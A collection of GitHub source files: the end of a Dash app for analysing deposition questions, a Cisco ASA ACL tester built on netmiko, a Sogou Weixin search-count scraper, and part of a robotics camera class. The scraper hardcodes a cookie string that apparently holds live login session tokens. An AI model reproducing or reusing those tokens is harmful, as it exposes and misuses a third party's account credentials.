Visualiser\"),\n html.P(\n \"After you select a case and click 'Create visualisation' (and after a bit of time, should be under 20 seconds)\"\n \" an interactive visualisation should appear. Questions which have a similar mean\"\n \"ing will appear closer together. You can hover over the points to reveal the questions. You can\"\n \" zoom in by dragging a rectangle over the part of the graph you want to zoom in on.\"\n \" You can reset the plot by clicking the icon in the shape of a house in the top-right.\"\n ),\n html.Div(\n dcc.Dropdown(\n id=\"case_selection\",\n options=[{\"label\": case, \"value\": case} for case in cases],\n value=cases[0],\n style={\"width\": \"80%\"},\n )\n ),\n html.Button(\"Create visualisation\", id=\"visualisation_button\"),\n dcc.Graph(id=\"question-cluster-graph\"),\n html.H3(\"Similar question finder\"),\n html.P(\n \"After selecting a case, you can enter\"\n \" a question in the box below. You will then be showed the top 10 most similar questions \"\n \" along with their answers, and a 'similarity score' that shows how much the algorithms think\"\n \" the given questions are similar to the question you entered.\"\n ),\n dcc.Textarea(\n id=\"users_question\",\n placeholder=\"Enter a question...\",\n style={\"width\": \"100%\"},\n ),\n html.Button(\"Find similar questions\", id=\"similar_questions_button\"),\n html.P(id=\"similar_questions\", style={'marginBottom': '5em'}),\n html.H3(\"Lawyer Stats\"),\n html.P(\n \"This tool produces statistics that allow you to compare how different lawyers ask\"\n \" questions.\"\n ),\n html.Div(\n dcc.Dropdown(\n id=\"statistic_selection\",\n options=[\n {\"label\": \"Average words per question\", \"value\": \"av_num_words\"},\n {\"label\": \"Objection ratio\", \"value\": \"objection_ratio\"},\n {\"label\": \"Strike ratio\", \"value\": \"strike_ratio\"},\n ],\n value=\"Please select a statistic\",\n style={\"width\": \"80%\"},\n )\n ),\n html.P(id=\"lawyer_stats\", style={'marginBottom': '5em'}),\n html.Div(children=\"\", id=\"intermediate-data\", style={\"display\": \"none\"}),\n ],\n className=\"app-site\",\n)\n\n\n@app.callback(\n [\n Output(\"question-cluster-graph\", \"figure\"),\n Output(\"intermediate-data\", \"children\"),\n ],\n Input(\"visualisation_button\", \"n_clicks\"),\n State(\"case_selection\", \"value\"),\n)\ndef process_case_and_create_plot(n, case_selection):\n if not n:\n return empty_plot()\n\n print(case_selection)\n\n filenames = df_metadata.loc[df_metadata.case == case_selection, \"filename\"].values\n\n # corpus = []\n # for filename in filenames:\n # try:\n # df = pd.read_csv(dir_name + filename[:-3] + \"csv\", index_col=0)\n # df = df[df.text_type.isin([\"q\"])]\n # corpus += df.text.values.tolist()\n # except:\n # print(filename)\n\n # loop through files to create frame containing all questions and answers\n df_aq = pd.DataFrame(columns=[\"text\", \"text_type\", \"filename\"])\n for filename in filenames:\n df_individual_aq = pd.DataFrame(columns=[\"text\", \"text_type\", \"filename\"])\n\n df_individual_full = pd.read_csv(dir_name + filename[:-3] + \"csv\", index_col=0)\n indices = df_individual_full.text_type.isin([\"a\", \"q\"])\n\n df_individual_aq[\"text\"] = df_individual_full.loc[indices, \"text\"]\n df_individual_aq[\"text_type\"] = df_individual_full.loc[indices, \"text_type\"]\n df_individual_aq[\"filename\"] = filename[:-4]\n\n df_aq = pd.concat([df_aq, df_individual_aq], axis=0, ignore_index=True)\n\n # for each question, determine if it was answered\n # if yes, add that answer to new column\n indices = (df_aq.text_type == \"q\") & (df_aq.text_type.shift(-1) == \"a\")\n indices_a = indices.shift(1)\n indices_a[0] = False\n df_aq.loc[indices, \"answer\"] = df_aq.loc[indices_a, \"text\"].values\n df_q = df_aq.loc[df_aq.text_type == \"q\", [\"text\", \"answer\", \"filename\"]]\n\n # vectorise corpus using Univeral Sentence Embedding\n df_q[\"vectors\"] = embed(df_q.text).numpy().tolist()\n\n vectors_dim_reduced = umap.UMAP(random_state=0).fit_transform(df_q.vectors.tolist())\n df_q[\"x\"] = vectors_dim_reduced[:, 0]\n df_q[\"y\"] = vectors_dim_reduced[:, 1]\n\n df_q[\"clusters\"] = hdbscan.HDBSCAN().fit(vectors_dim_reduced).labels_\n\n # indices = clusters > -1\n\n df_plot = pd.DataFrame(vectors_dim_reduced, columns=[\"x\", \"y\"])\n df_plot[\"Text\"] = df_q.text.values\n df_plot[\"cluster\"] = df_q.clusters.values\n\n # need to manually wrap text for plotly, using html newline tags\n df_plot.Text = df_plot.Text.apply(\n lambda txt: \"
\".join(textwrap.wrap(str(txt), width=30))\n )\n\n df_plot = df_plot[df_plot.cluster > -1]\n\n fig = px.scatter(\n df_plot,\n x=\"x\",\n y=\"y\",\n hover_data=dict(x=False, y=False, Text=True, cluster=False),\n width=600,\n height=600,\n color=\"cluster\",\n color_continuous_scale=\"rainbow\",\n )\n\n fig.update(layout_coloraxis_showscale=False)\n fig.update_layout(\n plot_bgcolor=\"rgba(0, 0, 0, 0)\",\n title=f\"Visualising the questions from the case {case_selection}\",\n )\n\n fig.update_xaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n fig.update_yaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n\n print(case_selection)\n return fig, df_q.to_json(date_format=\"iso\", orient=\"split\")\n\n\n@app.callback(\n Output(\"similar_questions\", \"children\"),\n Input(\"similar_questions_button\", \"n_clicks\"),\n [State(\"intermediate-data\", \"children\"), State(\"users_question\", \"value\")],\n)\ndef find_similar_questions(n, data, question):\n if not n:\n return \"\"\n if not data:\n return \"Please select a case first\"\n\n df = pd.read_json(data, orient=\"split\")\n\n q_vector = embed([question])[0].numpy()\n vectors = np.array(df.vectors.tolist())\n df[\"similarity\"] = vectors @ q_vector.T\n df.sort_values(by=\"similarity\", axis=0, ascending=False, inplace=True)\n\n similar_questions_list = []\n for i in range(10):\n index = df.index[i]\n similarity = df.loc[index, \"similarity\"]\n question = df.loc[index, \"text\"]\n answer = df.loc[index, \"answer\"]\n filename = df.loc[index, \"filename\"]\n\n similar_questions_list.append(f\"Question similarity score: {similarity}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(f\"Question: {question}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(f\"Answer: {answer}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(f\"Deposition: {filename}\")\n similar_questions_list.append(html.Br())\n similar_questions_list.append(html.Br())\n\n return similar_questions_list\n\n\n@app.callback(\n Output(\"lawyer_stats\", \"children\"),\n Input(\"statistic_selection\", \"value\"),\n)\ndef produce_lawyer_stats(statistic):\n if statistic == 'Please select a statistic':\n return statistic\n\n top10 = df_lawyers.loc[\n df_lawyers.num_questions > 20, [statistic]\n ].sort_values(by=statistic, axis=0, ascending=False).head(10)\n\n bottom10 = df_lawyers.loc[\n df_lawyers.num_questions > 20, [statistic]\n ].sort_values(by=statistic, axis=0, ascending=True).head(10)\n\n lawyer_stats = []\n\n lawyer_stats.append(html.H6('Highest 10'))\n for i in range(10):\n lawyer_stats.append(f'{round(top10[statistic][i],2)} -- {top10.index[i]}')\n lawyer_stats.append(html.Br())\n lawyer_stats.append(html.Br())\n \n lawyer_stats.append(html.H6('Lowest 10'))\n for i in range(10):\n lawyer_stats.append(f'{round(bottom10[statistic][i],2)} -- {bottom10.index[i]}')\n lawyer_stats.append(html.Br())\n lawyer_stats.append(html.Br())\n\n return lawyer_stats\n\n\n\ndef empty_plot():\n fig = px.scatter(\n pd.DataFrame(columns=[\"x\", \"y\"]),\n x=\"x\",\n y=\"y\",\n width=600,\n height=600,\n )\n\n fig.update(layout_coloraxis_showscale=False)\n fig.update_layout(\n plot_bgcolor=\"rgba(0, 0, 0, 0)\",\n title=f\"Empty plot. Please select a case\",\n )\n\n fig.update_xaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n fig.update_yaxes(\n linecolor=\"black\",\n mirror=True,\n title=None,\n showticklabels=False,\n linewidth=2,\n )\n\n return fig, None\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8888)","repo_name":"pranshukapri/lovekush-codebase","sub_path":"codebase-lovkush/dash_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71461142800","text":"import os\nimport re\nimport sys\nimport yaml\nimport pyperclip\nfrom getpass import getpass\nfrom netmiko import ConnectHandler\n\n\ndef packet_tracer(device_name, acl_entries_final):\n '''Test an ASA access-list and add missing entries to it if needed'''\n\n os.system('color')\n ALLOWED = '\\x1b[6;30;42m' + 'ALLOWED!' + '\\x1b[0m'\n DENIED = '\\x1b[6;37;41m' + 'DENIED!' + '\\x1b[0m'\n\n ace_first = acl_entries_final[0]\n src_ip = re.search(r'(tcp|udp).*?(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})', ace_first).group(2)\n\n net_connect = ConnectHandler(**device_name)\n\n output_show_route = net_connect.send_command('sh route {}'.format(src_ip))\n for i in output_show_route.splitlines():\n intf_match = re.search(r'via ([a-zA-Z0-9_-]+$)', i)\n if intf_match:\n pkt_tracer_intf = intf_match.group(1)\n print('\\nInbound interface name:', pkt_tracer_intf)\n break\n else:\n output_show_route = net_connect.send_command('sh route 0.0.0.0')\n for i in output_show_route.splitlines():\n intf_match = re.search(r'via ([a-zA-Z0-9_-]+$)', i)\n if intf_match:\n pkt_tracer_intf = intf_match.group(1)\n print('\\nInbound interface name:', pkt_tracer_intf)\n break\n\n packet_tracer_commands = []\n for ace in acl_entries_final:\n components = re.search(r'(tcp|udp).*?'\n '(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}).*?'\n '(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}).*?'\n '(\\d+)', ace)\n \n packet_tracer_commands.append('packet-tracer input {} {} {} 10240 {} {} xml'.format(\n pkt_tracer_intf,\n components.group(1),\n components.group(2),\n components.group(3),\n components.group(4)))\n output_sh_run_acl_group = net_connect.send_command('sh run access-group')\n regex_pattern = r'access-group ([a-zA-Z0-9_-]+) in interface {}$'.format(pkt_tracer_intf)\n for i in output_sh_run_acl_group.splitlines():\n intf_match = re.search(regex_pattern, i)\n if intf_match:\n acl_name = intf_match.group(1)\n print('ACL name:', intf_match.group(1), '\\n')\n break\n \n acl_to_configure = []\n for index, command_entry in enumerate(packet_tracer_commands):\n output = net_connect.send_command(command_entry)\n for line in output.splitlines():\n search_result = re.search(r'(\\w+)', line)\n if search_result:\n if search_result.group(1) == 'allow':\n print(f'{command_entry} --> {ALLOWED}')\n for line_x in output.splitlines():\n search_result_x = re.search(r'access-list.*', line_x)\n if search_result_x:\n print('\\t', search_result_x.group())\n print()\n break\n for line in output.splitlines():\n search_result_nat = re.search(r'Untranslate\\s+([0-9.]+)/.+to\\s+([0-9.]+)/', line)\n if search_result_nat and (search_result_nat.group(1) != search_result_nat.group(2)):\n print(f'\\t\\tNAT to {search_result_nat.group(2)} performed.\\n')\n elif search_result.group(1) == 'drop':\n print(f'{command_entry} --> {DENIED}')\n for line_y in output.splitlines():\n search_result_y = re.search(r'(.+)', line_y)\n if search_result_y:\n print('\\t Reason:', search_result_y.group(1))\n print()\n break\n for line in output.splitlines():\n search_result_nat = re.search(r'Untranslate\\s+([0-9.]+)/.+to\\s+([0-9.]+)/', line)\n if search_result_nat and (search_result_nat.group(1) != search_result_nat.group(2)):\n print(f'\\t\\tNAT to {search_result_nat.group(2)} required.\\n')\n acl_to_configure.append(re.sub(r'(host.*host) ([0-9.]+)',\n r'\\1 ' + f'{search_result_nat.group(2)}',\n acl_entries_final[index]))\n break\n else:\n acl_to_configure.append(acl_entries_final[index])\n else:\n print(f'{command_entry} --> UNKNOWN ACTION')\n\n if len(acl_to_configure) == 0:\n print('\\nNo additional access-list entries need to be configured.')\n else:\n print('\\n\\nThe following ACL entries should be configured:\\n')\n acl_name_replacement = r'access-list {} '.format(acl_name)\n config_commands = []\n for ace in acl_to_configure:\n ace_final = re.sub(r'access-list ([a-zA-Z0-9_-]+) ', acl_name_replacement, ace)\n config_commands.append(ace_final)\n print(ace_final)\n\n full_access_answer = input('\\nWould you like to add full TCP/UDP acceess for these access rules (default - NO, y - YES)?:')\n print()\n config_commands_temp = []\n if full_access_answer == 'y':\n for line in config_commands:\n config_commands_temp.append(line.split()[:-2])\n config_commands.clear()\n for line in config_commands_temp:\n config_commands.append(' '.join(line))\n config_commands = list(set(config_commands))\n for line in config_commands:\n print(line)\n\n config_answer = input(f'\\nWould you like to add these access rules to the ACL: {acl_name}? (y/n):')\n if config_answer == 'y':\n print('\\nAdding rules to the ACL and saving config...')\n net_connect.send_config_set(config_commands)\n net_connect.send_command('write memory')\n print('\\nDone.\\n')\n \n print('\\nClosing SSH session to the firewall...')\n net_connect.disconnect()\n print('Done.')\n\n\ndef main():\n username = 'ENTER_USERNAME_HERE'\n secret_pass = getpass('\\nEnter your password: ')\n \n with open(r'./net_devices.yml', 'r') as file:\n asa_params = yaml.load(file, Loader=yaml.FullLoader)\n \n acl_entries_final_range = [line for line in pyperclip.paste().splitlines() if len(line) != 0]\n print('\\nACL contains {} entries:\\n'.format(len(acl_entries_final_range)))\n for i in acl_entries_final_range:\n print(i)\n \n while True:\n answer = input('\\nWould you like to test these ACL entries with packet-tracer on a firewall (y/n): ')\n \n msg = '''\n Choose the firewall:\n \n ASA_1 ---------- 1\n ASA_2 ---------- 2\n ASA_3 ---------- 3\n \n : '''\n \n if answer == 'y':\n fw_number = int(input(msg))\n if fw_number == 1:\n print('\\nTesting on ASA_1...\\n')\n asa_params['asa_device_1']['username'] = username\n asa_params['asa_device_1']['password'] = secret_pass\n packet_tracer(asa_params['asa_device_1'], acl_entries_final_range)\n elif fw_number == 2:\n print('\\nTesting on ASA_2...\\n')\n asa_params['asa_device_2']['username'] = username\n asa_params['asa_device_2']['password'] = secret_pass\n packet_tracer(asa_params['asa_device_2'], acl_entries_final_range)\n elif fw_number == 3:\n print('\\nTesting on ASA_3...\\n')\n asa_params['asa_device_3']['username'] = username\n asa_params['asa_device_3']['password'] = secret_pass\n packet_tracer(asa_params['asa_device_3'], acl_entries_final_range)\n else:\n print('\\nBye!')\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ghXplorer/cisco-asa-acl-tester","sub_path":"cisco_asa_acl_tester.py","file_name":"cisco_asa_acl_tester.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13551620772","text":"#-*-coding:utf-8-*- \n#2017-9-20 JoeyChui sa517045@mail.ustc.edu.cn\n\nimport time, re, requests, json, xlwt\nfrom requests.exceptions import RequestException\n\ndef getOnePage(url, encoding = 'UTF-8', headers = {}, cookies = {}, json = False):\n try:\n response = requests.get(url, headers = headers, cookies = cookies)\n if response.status_code == 200:\n response.encoding = encoding\n if json:\n return response.json()\n return response.text\n return None\n except RequestException:\n print(\"ER:getOnePage\", url)\n return None\n\ndef reHTML(patternStr, html, first = False):\n pattern = re.compile(patternStr, re.S)\n items = re.findall(pattern, html)\n if items == []:\n return None\n if first:\n return items[0]\n return items\n\n\ndef cutdouhao(num):\n if not num:\n return ''\n result = ''\n for ele in num:\n if ele.isdigit():\n result += ele\n return result\n\ndef wtToXLS(content, filename):\n workbook = xlwt.Workbook(encoding = 'utf-8')\n booksheet = workbook.add_sheet('Sheet 1', cell_overwrite_ok = True)\n for i, rowVal in enumerate(content):\n for j, colVal in enumerate(rowVal):\n booksheet.write(i, j, colVal)\n workbook.save('%s.xls' % filename)\n return\n\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\",\n \"Host\": \"seixin.sogou.com\"}\ncookies = {\"Cookie\": 'CXID=CF8CB896101787C6447D59728D17B8F7; SUV=00C2A3A53AD223E35A45F4DC35442178; usid=7iRdDXk8rVSsjTxe; SUID=DE4388753765860A5A37BE390001B0DB; ad=lZllllllll2z2EcilllllVIJRallllllNYPRTklllxwlllll4Cxlw@@@@@@@@@@@; ABTEST=8|1514776687|v1; SNUID=93F4B9559F9AFE31CEF79294A0A140D2; JSESSIONID=aaafPYXMUQf_xcDTAmw8v; IPLOC=CN3205; sct=4; weixinIndexVisited=1; ppinf=5|1514778272|1515987872|dHJ1c3Q6MToxfGNsaWVudGlkOjQ6MjAxN3x1bmlxbmFtZToyNzolRTUlQjQlOTQlRTUlOEElOUIlRTglQkUlODl8Y3J0OjEwOjE1MTQ3NzgyNzJ8cmVmbmljazoyNzolRTUlQjQlOTQlRTUlOEElOUIlRTglQkUlODl8dXNlcmlkOjQ0Om85dDJsdUNvcTRJMFZYVjBZU3JxX05sbnV1VmdAd2VpeGluLnNvaHUuY29tfA; pprdig=V_IHkPcQUGLUZqolChlTcdH-iBHulRTIMqRLvrRs1KAD03qPlgmFl28fO80G6geWTysHBUFh1yAMmdSBFLnbPNeDtf58oXqf13nkAPuszKyZAh97KdhSoa78gq134Nr8Jm20hzIGbbKdJcfQFrMokiAG1Yp71XZr6Wt5TvZjoIA; sgid=04-30689591-AVpJrqBsbj0ACsRXt5icPBp4; ppmdig=15147782720000002eaf9fb9965dd6b7b90f5a232ca50164'}\n\nbigTable = [[\"candidate\", \"number\", \"url\"]]\n\nstarCandidate = ['韩雪', '黄轩', '李小璐', '张雨绮', '迪丽热巴', '黄子韬', '马天宇', '陈学冬', '马可', '唐艺昕', '窦骁', '李治廷', '鹿晗', '赵丽颖', '韩庚', '陈晓', '王一博', '张天爱', '于朦胧', '张晓晨', '宋祖儿', '贾乃亮', '蒋劲夫', '吉克隽逸', '杨蓉', '张嘉倪', '关晓彤', 'angelababy', '吴亦凡', '薛之谦', '翟天临', '杨幂', '张哲瀚', '鞠婧祎', '张歆艺', '古力娜扎', '杨洋', '张艺兴', '胡歌', '甘薇', '李易峰', '刘亦菲', '郑爽', '范冰冰', '林俊杰', '陈伟霆', '田馥甄', '周杰伦', '华晨宇', '周星驰']\nfor candidate in starCandidate:\n url = 'http://weixin.sogou.com/weixin?type=2&query=' + candidate\n #html = getOnePage(url, headers = headers, cookies = cookies)\n html = getOnePage(url)\n patternStr = 'pagebar_container.*?class=\"mun\">.*?([,\\d]+).*?<' \n item = reHTML(patternStr, html, first = True)\n number = cutdouhao(item)\n print(url, item, number)\n bigTable.append([candidate, number, url])\n time.sleep(10)\n\nwtToXLS(bigTable, \"meitiguanzhu\")\n","repo_name":"JoeyChui/privatecode","sub_path":"周三回去/冠影/Ranking/crawlStarMeiTiGuanZhuDuList.py","file_name":"crawlStarMeiTiGuanZhuDuList.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71194040083","text":"\"\"\"!\nClass to represent the camera.\n\"\"\"\n\nimport cv2\nimport time\nimport numpy as np\nfrom PyQt4.QtGui import QImage\nfrom PyQt4.QtCore import QThread, pyqtSignal, QTimer\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CameraInfo\nfrom apriltag_ros.msg import *\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom block_detection import DetectBlocks\n\n\nclass Camera():\n \"\"\"!\n @brief This class describes a camera.\n \"\"\"\n\n def __init__(self):\n \"\"\"!\n @brief Construcfalsets a new instance.\n \"\"\"\n self.VideoFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.GridFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.DetectionFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.TagImageFrame = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.DepthFrameRaw = np.zeros((720, 1280)).astype(np.uint16)\n \"\"\" Extra arrays for colormaping the depth image\"\"\"\n self.DepthFrameHSV = np.zeros((720, 1280, 3)).astype(np.uint8)\n self.DepthFrameRGB = np.array([])\n\n # mouse clicks & calibration variables\n self.camera_calibrated = False\n #self.intrinsic_matrix = np.eye(3)\n self.intrinsic_matrix = np.array([(896.861, 0, 660.523), (0, 897.203, 381.419), (0, 0, 1)]) # factory\n self.intrinsic_inverse = np.linalg.inv(self.intrinsic_matrix)\n #self.intrinsic_matrix = np.array([(905.8, 0, 668.8), (0, 911.7, 376.8), (0, 0, 1)]) # calibrated\n #self.intrinsic_matrix = np.array([(913.4, 0, 673.0), (0, 917.4, 377.7), (0, 0, 1)]) # calibrated\n self.extrinsic_matrix = np.eye(4)\n self.extrinsic_inverse = np.eye(4)\n self.homography_matrix = np.eye(3)\n\n self.last_click = np.array([0, 0])\n self.new_click = False\n self.rgb_click_points = np.zeros((5, 2), int)\n self.depth_click_points = np.zeros((5, 2), int)\n self.grid_x_points = np.arange(-450, 500, 50)\n self.grid_y_points = np.arange(-175, 525, 50)\n self.grid_points = np.array(np.meshgrid(self.grid_x_points, self.grid_y_points))\n self.grid_points = np.concatenate((self.grid_points, np.zeros_like(self.grid_points[0,:,:]).reshape(1,14,19)), axis = 0)\n self.grid_points = np.concatenate((self.grid_points, np.ones_like(self.grid_points[0,:,:]).reshape(1,14,19)), axis = 0)\n \n self.grid_points2 = np.array([np.ravel(self.grid_points[0,:,:]), np.ravel(self.grid_points[1,:,:]), \n np.ravel(self.grid_points[2,:,:]), np.ravel(self.grid_points[3,:,:])])\n\n self.z_offset = -13 # amount to add to all z measurements before calibration\n self.z_b = 8.75 # z = my + b, where y is y world value\n self.z_m = -0.04\n # b was 6.75\n # m was -0.05\n \n \n\n self.tag_detections = np.array([])\n self.tag_locations = [[-250, -25], [250, -25], [250, 275]]\n \"\"\" block info \"\"\"\n self.block_contours = np.array([])\n self.block_detections = np.array([])\n\n self.red_threshold = np.array([[165,2], [80,255], [20,255]], dtype= np.float32)\n self.orange_threshold = np.array([[3,14], [120,255], [47,255]], dtype= np.float32)\n self.yellow_threshold = np.array([[21,27], [158, 255], [50, 255]], dtype= np.float32)\n self.green_threshold = np.array([[65, 88], [100,255], [53, 255]], dtype= np.float32)\n self.blue_threshold = np.array([[100, 109], [151, 255], [52,255]], dtype= np.float32)\n self.purple_threshold = np.array([[110, 157], [45, 255], [25,255]], dtype= np.float32)\n # (color_str, color_BGR, color_threshold)\n self.colors = [(\"red\", (255, 0, 0), self.red_threshold, 0), \n (\"orange\", (255, 165, 0), self.orange_threshold, 1), \n (\"yellow\", (255, 255, 0), self.yellow_threshold, 2), \n (\"green\", (0, 255, 0), self.green_threshold, 3), \n (\"blue\", (0,0,255), self.blue_threshold, 4), \n (\"purple\", (160, 32, 240), self.purple_threshold, 5)]\n\n self.xy_threshold = np.array([[-500, 500], [-10, 475], [-5000,5000]], dtype= np.float32) # note, no threshold on z, ((x_low, x_high),(y_low, y_high), (z_low, z_high))\n self.erosion_kernel_size = 1\n self.erosion_kernel_shape = 0 # 0 is rectangle\n self.dilation_kernel_size = 1\n self.dilation_kernel_shape = 0 # 0 is rectangle\n self.morphological_constraints = np.array([self.erosion_kernel_size, self.erosion_kernel_shape, self.dilation_kernel_size, self.dilation_kernel_shape])\n self.min_pixels_for_rectangle = 10\n self.contour_constraints = np.array([self.min_pixels_for_rectangle])\n\n # self.pixel_grid stores a [921600, 3, 1] array, where each position on axis 0 is a pizel location,\n # and each element on axis 1 is the u,v,1 values at that position\n self.pixel_grid = np.array(np.meshgrid(np.arange(0,1280,1), np.arange(0,720,1)))\n self.pixel_grid = self.pixel_grid.transpose(2,1,0)\n self.pixel_grid = self.pixel_grid.reshape(-1,2,1)\n self.pixel_grid = np.concatenate((self.pixel_grid, np.ones((921600, 1, 1))), axis = 1)\n\n self.world_correction_matrix = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, self.z_m, 1, self.z_b]])\n\n self.position_image = np.zeros((720,1280,3))\n\n # detected block = [(x,y,z), theta, size_str, color_num]\n self.detected_blocks = []\n\n\n def pixel2World(self, pixel_coord):\n\n z = self.DepthFrameRaw[pixel_coord[1,0]][pixel_coord[0,0]] + self.z_offset\n camera_coord = np.ones([4,1])\n camera_coord[0:3,:] = np.dot((z),np.dot(self.intrinsic_inverse, pixel_coord)) \n world_coord = np.dot(self.extrinsic_inverse, camera_coord)\n world_coord[2,0] = world_coord[2,0] + self.z_m * world_coord[1,0] + self.z_b\n return world_coord\n\n\n def processVideoFrame(self):\n \"\"\"!\n @brief Process a video frame\n \"\"\"\n cv2.drawContours(self.VideoFrame, self.block_contours, -1,\n (255, 0, 255), 3)\n\n def ColorizeDepthFrame(self):\n \"\"\"!\n @brief Converts frame to colormaped formats in HSV and RGB\n \"\"\"\n self.DepthFrameHSV[..., 0] = self.DepthFrameRaw >> 1\n self.DepthFrameHSV[..., 1] = 0xFF\n self.DepthFrameHSV[..., 2] = 0x9F\n self.DepthFrameRGB = cv2.cvtColor(self.DepthFrameHSV,\n cv2.COLOR_HSV2RGB)\n\n def loadVideoFrame(self):\n \"\"\"!\n @brief Loads a video frame.\n \"\"\"\n self.VideoFrame = cv2.cvtColor(\n cv2.imread(\"data/rgb_image.png\", cv2.IMREAD_UNCHANGED),\n cv2.COLOR_BGR2RGB)\n\n def loadDepthFrame(self):\n \"\"\"!\n @brief Loads a depth frame.\n \"\"\"\n self.DepthFrameRaw = cv2.imread(\"data/raw_depth.png\",\n 0).astype(np.uint16)\n\n def convertQtVideoFrame(self):\n \"\"\"!\n @brief Converts frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.VideoFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtGridFrame(self):\n \"\"\"!\n @brief Converts frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.GridFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtDetectionFrame(self):\n \"\"\"!\n @brief Converts frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.DetectionFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtDepthFrame(self):\n \"\"\"!\n @brief Converts colormaped depth frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n try:\n img = QImage(self.DepthFrameRGB, self.DepthFrameRGB.shape[1],\n self.DepthFrameRGB.shape[0], QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtTagImageFrame(self):\n \"\"\"!\n @brief Converts tag image frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.TagImageFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def getAffineTransform(self, coord1, coord2):\n \"\"\"!\n @brief Find the affine matrix transform between 2 sets of corresponding coordinates.\n\n @param coord1 Points in coordinate frame 1\n @param coord2 Points in coordinate frame 2\n\n @return Affine transform between coordinates.\n \"\"\"\n pts1 = coord1[0:3].astype(np.float32)\n pts2 = coord2[0:3].astype(np.float32)\n print(cv2.getAffineTransform(pts1, pts2))\n return cv2.getAffineTransform(pts1, pts2)\n\n def loadCameraCalibration(self, file):\n \"\"\"!\n @brief Load camera intrinsic matrix from file.\n\n TODO: use this to load in any calibration files you need to\n\n @param file The file\n \"\"\"\n pass\n\n def blockDetector(self):\n \"\"\"!\n @brief Detect blocks from rgb\n\n TODO: Implement your block detector here. You will need to locate blocks in 3D space and put their XYZ\n locations in self.block_detections\n \"\"\"\n pass\n\n def detectBlocksInDepthImage(self):\n \"\"\"!\n @brief Detect blocks from depth\n\n TODO: Implement a blob detector to find blocks in the depth image\n \"\"\"\n pass\n\n def projectGridInRGBImage(self):\n \"\"\"!\n @brief projects\n\n TODO: Use the intrinsic and extrinsic matricies to project the gridpoints \n on the board into pixel coordinates. copy self.VideoFrame to self.GridFrame and\n and draw on self.GridFrame the grid intersection points from self.grid_points\n (hint: use the cv2.circle function to draw circles on the image)\n \"\"\"\n self.GridFrame = self.VideoFrame.copy()\n \n if self.camera_calibrated:\n\n \n #H = cv2.findAffine(edge_points_pixel[],remap_points_pixel)[0]\n \n\n grid_camera_coord = np.dot(self.extrinsic_matrix, self.grid_points2)\n z_camera_coord = grid_camera_coord[2,:]\n grid_pixel_coord = np.dot(self.intrinsic_matrix, grid_camera_coord[0:3,:])\n #print(grid_pixel_coord.shape)\n for i in range(np.shape(grid_pixel_coord)[1]):\n cv2.circle(self.GridFrame, (int(grid_pixel_coord[0,i]/z_camera_coord[i]), int(grid_pixel_coord[1,i]/z_camera_coord[i])), 3, (255,0,0), -1)\n\n self.GridFrame = cv2.warpPerspective(self.GridFrame, self.homography_matrix, (self.GridFrame.shape[1], self.GridFrame.shape[0]))\n\n def BlockDetection(self):\n #self.DetectionFrame = self.VideoFrame.copy()\n rgb_image = self.VideoFrame.copy()\n depth_image = self.DepthFrameRaw.copy()\n\n rgb_image, self.detected_blocks = DetectBlocks(rgb_image, depth_image, self)\n\n \n #self.DetectionFrame = cv2.bitwise_and(hsv_image, hsv_image, mask = image)\n #mask_image = np.stack((mask, np.zeros_like(mask), np.zeros_like(mask)), axis = 2)\n self.DetectionFrame = rgb_image\n\n\n \n\nclass ImageListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(topic, Image, self.callback)\n self.camera = camera\n\n def callback(self, data):\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, data.encoding)\n except CvBridgeError as e:\n print(e)\n self.camera.VideoFrame = cv_image\n\n\nclass TagImageListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.bridge = CvBridge()\n 